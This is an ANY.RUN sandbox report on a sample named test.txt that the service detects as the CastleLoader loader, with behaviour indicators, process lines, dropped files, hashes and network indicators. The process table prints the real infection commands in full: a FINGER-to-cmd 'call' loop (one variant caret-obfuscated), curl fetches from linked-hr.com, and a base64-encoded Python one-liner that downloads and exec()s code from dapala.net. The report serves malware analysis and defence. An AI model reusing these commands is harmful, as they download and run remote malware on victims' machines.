Malware analysis test.txt Malicious activity | ANY.RUN

Add for printing

File name:	test.txt
Full analysis:	https://app.any.run/tasks/fee41308-9d3b-486c-a6e0-d0cd8766d3ad
Verdict:	Malicious activity
Threats:	CastleLoader is a modern malware loader designed to quietly establish initial access and deliver follow-up payloads such as stealers, RATs, and ransomware. It focuses on stealth, flexibility, and rapid payload rotation, making it an effective tool for financially motivated threat actors and a persistent problem for enterprise defenders. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Malware Trends Tracker >>>
Analysis date:	March 30, 2026, 16:54:44
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	castleloader loader python
Indicators:
MIME:	text/plain
File info:	ASCII text, with no line terminators
MD5:	63430A9A43D5976280121B9FEBE16569
SHA1:	5AB85B7B95156046FBA0B440C12742328BAF2368
SHA256:	700006CFDC5A363139713BF74BF59A23928AF8F11A5B560907B4227BD92077A7
SSDEEP:	6:IhZHuxQbsbYyzVP3fPUuPjLlgKa3D2fmx+e1hxy1w:IPfb9ycKq2fEhxl

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
Google Chrome (133.0.6943.127)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Java(TM) SE Development Kit 25.0.2 (64-bit) (25.0.2.0)
Microsoft Edge (133.0.3065.92)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (136.0)
Mozilla Maintenance Service (136.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- CASTLELOADER has been detected
  - cmd.exe (PID: 2392)
SUSPICIOUS
- Application launched itself
  - cmd.exe (PID: 3340)
  - cmd.exe (PID: 2392)
  - cmd.exe (PID: 2164)
- Starts CMD.EXE for commands execution
  - cmd.exe (PID: 3340)
  - cmd.exe (PID: 7604)
- Starts CMD.EXE and keeps the shell open after execution
  - cmd.exe (PID: 2392)
  - cmd.exe (PID: 2164)
- Uses TASKKILL.EXE to kill process
  - cmd.exe (PID: 2164)
- Starts Curl with silent output flags
  - curl.exe (PID: 204)
- The process drops C-runtime libraries
  - curl.exe (PID: 204)
  - tar.exe (PID: 2032)
- Executable content was dropped or overwritten
  - tar.exe (PID: 2032)
- The executable file from the user directory is run by the CMD process
  - pythonw.exe (PID: 4336)
- Process drops python dynamic module
  - tar.exe (PID: 2032)
- Loads Python modules
  - pythonw.exe (PID: 4336)
- The process executes files with name similar to system file names
  - cmd.exe (PID: 2164)
- Reads the date of Windows installation
  - StartMenuExperienceHost.exe (PID: 7960)
INFO
- FOR cycle in command line
  - cmd.exe (PID: 2392)
  - cmd.exe (PID: 2164)
- Checks supported languages
  - curl.exe (PID: 204)
  - tar.exe (PID: 2032)
  - curl.exe (PID: 2648)
  - pythonw.exe (PID: 4336)
  - TextInputHost.exe (PID: 1500)
  - StartMenuExperienceHost.exe (PID: 7960)
  - SearchApp.exe (PID: 7352)
- Reads the computer name
  - curl.exe (PID: 204)
  - TextInputHost.exe (PID: 1500)
  - curl.exe (PID: 2648)
  - pythonw.exe (PID: 4336)
  - SearchApp.exe (PID: 7352)
  - StartMenuExperienceHost.exe (PID: 7960)
- Execution of CURL command
  - cmd.exe (PID: 2164)
- Creates files or folders in the user directory
  - curl.exe (PID: 204)
  - tar.exe (PID: 2032)
- The sample compiled with english language support
  - curl.exe (PID: 204)
  - tar.exe (PID: 2032)
- Reads security settings of Internet Explorer
  - explorer.exe (PID: 6952)
  - StartMenuExperienceHost.exe (PID: 7960)
- Python executable
  - pythonw.exe (PID: 4336)
- Reads Environment values
  - SearchApp.exe (PID: 7352)
- Reads the machine GUID from the registry
  - SearchApp.exe (PID: 7352)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

146

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

204

curl -s -L --tlsv1.2 --ssl-no-revoke -o "C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32.pdf" www.python.org/ftp/python/3.15.0/python-3.15.0a1-embed-win32.zip

C:\Windows\System32\curl.exe

cmd.exe

User:

admin

Company:

curl, https://curl.se/

Integrity Level:

MEDIUM

Description:

The curl executable

Exit code:

Version:

8.4.0

Modules

Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll

1500

"C:\WINDOWS\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe

—

svchost.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Version:

123.26505.0.0

Modules

Images
c:\windows\systemapps\microsoftwindows.client.cbs_cw5n1h2txyewy\textinputhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\systemapps\microsoftwindows.client.cbs_cw5n1h2txyewy\vcruntime140_app.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll

2016

taskkill /f /im explorer.exe

C:\Windows\System32\taskkill.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Terminates Processes

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll

2032

tar -xf "C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32.pdf" -C "C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32"

C:\Windows\System32\tar.exe

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

bsdtar archive tool

Exit code:

Version:

3.5.2 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\tar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\archiveint.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll

2164

C:\WINDOWS\system32\cmd.exe /K for /f "skip=11 delims=" %S in ('FINGER wsMAysjGOg@finger.linked-hr.com') do call %S

C:\Windows\System32\cmd.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll

2392

"C:\Windows\system32\cmd.exe" /k start "" /min for /f "skip=11 delims=" %S in ('F^I^N^G^E^R wsMAysjGOg@f^i^n^g^e^r.^linked-hr.com') do call %S

C:\Windows\System32\cmd.exe

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll

2648

curl -s -L --tlsv1.2 --ssl-no-revoke linked-hr.com/leyts.php?Npier=1

C:\Windows\System32\curl.exe

cmd.exe

User:

admin

Company:

curl, https://curl.se/

Integrity Level:

MEDIUM

Description:

The curl executable

Exit code:

Version:

8.4.0

Modules

Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\cryptsp.dll

3276

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Console Window Host

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3340

C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\test.txt.bat" "

C:\Windows\System32\cmd.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll

4336

"C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\\\\\\\///////\\\\\\\///////\\\\\\\///////pythonw" -c "exec(__import__('base64').b64decode('IwBxAGUAMQBuAGsATgBiAEsARABtADMAQwBJAEIAMAB0AHIAbwB6AFYADQAKAGkAbQBwAG8AcgB0ACAAcwBzAGwADQAKAGkAbQBwAG8AcgB0ACAAdABpAG0AZQANAAoAaQBtAHAAbwByAHQAIAB1AHIAbABsAGkAYgAuAHIAZQBxAHUAZQBzAHQADQAKAHMAcwBsAC4AXwBjAHIAZQBhAHQAZQBfAGQAZQBmAGEAdQBsAHQAXwBoAHQAdABwAHMAXwBjAG8AbgB0AGUAeAB0ACAAPQAgAHMAcwBsAC4AXwBjAHIAZQBhAHQAZQBfAHUAbgB2AGUAcgBpAGYAaQBlAGQAXwBjAG8AbgB0AGUAeAB0AA0ACgBjACAAPQAgAHUAcgBsAGwAaQBiAC4AcgBlAHEAdQBlAHMAdAAuAHUAcgBsAG8AcABlAG4AKAAnAGgAdAB0AHAAOgAvAC8AZABhAHAAYQBsAGEALgBuAGUAdAAvADkANQAxADIANgBhAGUAYgAtADQAMQAyADAALQA1ADYAYgAxAC0AOABjADkAZQAtADYAMwBmAGQAZgAwAGMAMABiADYAZgA5AC8AcwBjAHIAMwAnACkALgByAGUAYQBkACgAKQAuAGQAZQBjAG8AZABlACgAJwB1AHQAZgAtADgAJwApAA0ACgB0AGkAbQBlAC4AcwBsAGUAZQBwACgAMgAuADEAKQANAAoAZQB4AGUAYwAoAGMAKQA=').decode('utf-16'))"

C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\pythonw.exe

cmd.exe

User:

admin

Company:

Python Software Foundation

Integrity Level:

MEDIUM

Description:

Python

Version:

3.15.0a1

Modules

Images
c:\users\admin\appdata\local\python-3.15.0a1-embed-win32\pythonw.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\users\admin\appdata\local\python-3.15.0a1-embed-win32\vcruntime140.dll

Add for printing

Total events

16 946

Read events

16 674

Write events

261

Delete events

Modification events


(PID) Process:	(6952) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e72-85a9-11eb-90a8-9a9b76358421}
Operation:	write	Name:	Data
Value: D60D00000DF0ADBA41000000080000000000008400000000000000300000000000000000FF06E703FF00000016000000FA99B7261F00000004400010010000000000000000000000000000000000000000005C005C003F005C00530054004F005200410047004500230056006F006C0075006D00650023007B00360039006500330033003200330066002D0039003500320034002D0031003100660030002D0062003400660035002D003800300036006500360066003600650036003900360033007D002300300030003000300030003000300030003100460035003000300030003000300023007B00350033006600350036003300300064002D0062003600620066002D0031003100640030002D0039003400660032002D003000300061003000630039003100650066006200380062007D000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005C005C003F005C0056006F006C0075006D0065007B00320066003500630035006500370032002D0038003500610039002D0031003100650062002D0039003000610038002D003900610039006200370036003300350038003400320031007D005C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004E005400460053000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000
(PID) Process:	(6952) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{2f5c5e72-85a9-11eb-90a8-9a9b76358421}
Operation:	write	Name:	Generation
Value: 2
(PID) Process:	(6952) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:	delete value	Name:	UpgradeOrPBRAttempts
Value:
(PID) Process:	(6952) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:	delete value	Name:	DefaultStartLayout_UseWin7UpgradeBehavior
Value:
(PID) Process:	(6952) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:	delete value	Name:	DefaultStartLayout_UseWin8UpgradeBehavior
Value:
(PID) Process:	(6952) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:	delete value	Name:	LogonWork
Value:
(PID) Process:	(6952) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shutdown
Operation:	write	Name:	CleanShutdown
Value: 0
(PID) Process:	(6952) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Feeds\DSB
Operation:	write	Name:	IsDynamicContentAvailable
Value: 1
(PID) Process:	(6952) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
Operation:	delete value	Name:	SearchboxTaskbarModeForceGlyph
Value:
(PID) Process:	(6952) explorer.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search
Operation:	write	Name:	SearchGlyphType
Value: 2

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2032	tar.exe	C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\python315.dll		executable
		MD5:BFE28753279E5C36675D7E7EE8C5A7B2	SHA256:7AD66D30A04C646E4E9CCB8875C78BDDB480C4DC4766A144CEC8D96D35D120F5
2032	tar.exe	C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\pyexpat.pyd		executable
		MD5:3FD45F485295DD44F280E0F3E1D89FBA	SHA256:4BBD6A9BF25B5B3616FDB214A05462892CF628EE2BDF38B0DDC2C8C1223203B5
2032	tar.exe	C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\unicodedata.pyd		executable
		MD5:3095739C768F05A913CAE0578EE34A51	SHA256:D5F53B2183DEB73C539C6B903306116CD5D917484ACE9140A851AA36FA0395A1
2032	tar.exe	C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\pythonw.exe		executable
		MD5:71328D94E5BD61707456EF2578ECB90C	SHA256:9821D3DAD8587C083E4D3D33375A6F5A18399C882DF21E80846E93CF5404984B
204	curl.exe	C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32.pdf		compressed
		MD5:696674C76BFEE9C73D86F7B7BBC11F83	SHA256:3B797611AD41332BE215CF38F903E70625DA08753EEDAAC26F8C2B3CA4B6592C
2032	tar.exe	C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\python.exe		executable
		MD5:70EB57B202FE59562E7DCDFF1EDFD7C9	SHA256:C616A219026FFB3A7F63B16A6E52D35CA667251E55D2CBB9E7466B2ADC2D22FC
2032	tar.exe	C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\vcruntime140.dll		executable
		MD5:C33386A6E67BE415A24D9C431FFD42AC	SHA256:EB5B47CCEDDB4A45E059C1E1FCD2EFB016CB2BD9FE1FC0FD3F4C3C4CAB04153A
2032	tar.exe	C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\LICENSE.txt		text
		MD5:F5220A3766378179DBFB98C1EAE9A464	SHA256:935CF13E19F8C31B497D20B05D73623431A226B230C3599BC30FA3348979BC68
2032	tar.exe	C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\select.pyd		executable
		MD5:696674C76BFEE9C73D86F7B7BBC11F83	SHA256:3B797611AD41332BE215CF38F903E70625DA08753EEDAAC26F8C2B3CA4B6592C
2032	tar.exe	C:\Users\admin\AppData\Local\python-3.15.0a1-embed-win32\_asyncio.pyd		executable
		MD5:7B72F6CD4EE18893672DD2E48C88BCE7	SHA256:DA2AA115615A0B37C902F87E46338010C1677BE9CEA608DB04558AFBAC8B4B6A

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
204	curl.exe	GET	—	151.101.0.223:443	https://www.python.org/ftp/python/3.15.0/python-3.15.0a1-embed-win32.zip	US	—	—	unknown
—	—	GET	200	23.216.77.22:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	NL	binary	825 b	whitelisted
—	—	GET	200	23.59.18.102:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	US	binary	814 b	whitelisted
5532	SearchApp.exe	GET	200	23.11.41.157:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAjTxtAB8my1oj8MfWpz%2F7Y%3D	NL	binary	313 b	whitelisted
5532	SearchApp.exe	GET	200	204.79.197.203:80	http://oneocsp.microsoft.com/ocsp/MFQwUjBQME4wTDAJBgUrDgMCGgUABBQ3L3%2F%2Fa6ADK8NraY2GXzVaYrHG4AQUb6t%2B2v%2BXQ3LsO2d33oJhNYhHQoUCEzMAAAAGb6JMMcOVb6sAAAAAAAY%3D	US	binary	959 b	whitelisted
204	curl.exe	GET	301	151.101.0.223:80	http://www.python.org/ftp/python/3.15.0/python-3.15.0a1-embed-win32.zip	US	—	—	unknown
2648	curl.exe	GET	301	104.21.75.136:80	http://linked-hr.com/leyts.php?Npier=1	US	html	366 b	unknown
4336	pythonw.exe	GET	200	173.232.146.146:80	http://dapala.net/95126aeb-4120-56b1-8c9e-63fdf0c0b6f9/scr3	US	text	19.0 Kb	unknown
5316	svchost.exe	GET	200	23.11.41.157:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAz1vQYrVgL0erhQLCPM8GY%3D	NL	binary	471 b	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	Not routed	—	whitelisted
7784	svchost.exe	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
—	—	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
—	—	23.216.77.22:80	crl.microsoft.com	AKAMAI-ASN1	NL	whitelisted
—	—	48.192.1.64:443	activation-v2.sls.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
—	—	23.59.18.102:80	www.microsoft.com	AKAMAI-AS	US	whitelisted
5532	SearchApp.exe	2.16.204.160:443	www.bing.com	AKAMAI-ASN1	NL	whitelisted
5532	SearchApp.exe	23.11.41.157:80	ocsp.digicert.com	AKAMAI-AMS	NL	whitelisted
5532	SearchApp.exe	204.79.197.203:80	oneocsp.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
4	System	192.168.100.255:138	—	Not routed	—	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	20.73.194.208	whitelisted
crl.microsoft.com	23.216.77.22 23.216.77.29 23.216.77.26 23.216.77.20 23.216.77.18 23.216.77.31 23.216.77.21 23.216.77.30 23.216.77.25	whitelisted
activation-v2.sls.microsoft.com	48.192.1.64	whitelisted
www.microsoft.com	23.59.18.102	whitelisted
google.com	142.251.13.100 142.251.13.101 142.251.13.113 142.251.13.139 142.251.13.102 142.251.13.138	whitelisted
www.bing.com	2.16.204.160 2.16.204.155 2.16.204.137 2.16.204.151 2.16.204.142 2.16.204.148 2.16.204.141 2.16.204.136 2.16.204.153	whitelisted
ocsp.digicert.com	23.11.41.157	whitelisted
oneocsp.microsoft.com	204.79.197.203	whitelisted
finger.linked-hr.com	162.243.95.124	unknown
www.python.org	151.101.0.223 151.101.64.223 151.101.128.223 151.101.192.223	whitelisted

Threats

PID	Process	Class	Message
4336	pythonw.exe	Attempted Information Leak	ET INFO Python-urllib/ Suspicious User Agent

Add for printing

No debug info

General Info

test.txt

63430A9A43D5976280121B9FEBE16569

5AB85B7B95156046FBA0B440C12742328BAF2368

700006CFDC5A363139713BF74BF59A23928AF8F11A5B560907B4227BD92077A7

6:IhZHuxQbsbYyzVP3fPUuPjLlgKa3D2fmx+e1hxy1w:IPfb9ycKq2fEhxl

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

CASTLELOADER has been detected

SUSPICIOUS

Application launched itself

Starts CMD.EXE for commands execution

Starts CMD.EXE and keeps the shell open after execution

Uses TASKKILL.EXE to kill process

Starts Curl with silent output flags

The process drops C-runtime libraries

Executable content was dropped or overwritten

The executable file from the user directory is run by the CMD process

Process drops python dynamic module

Loads Python modules

The process executes files with name similar to system file names

Reads the date of Windows installation

INFO

FOR cycle in command line

Checks supported languages

Reads the computer name

Execution of CURL command

Creates files or folders in the user directory

The sample compiled with english language support

Reads security settings of Internet Explorer

Python executable

Reads Environment values

Reads the machine GUID from the registry

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings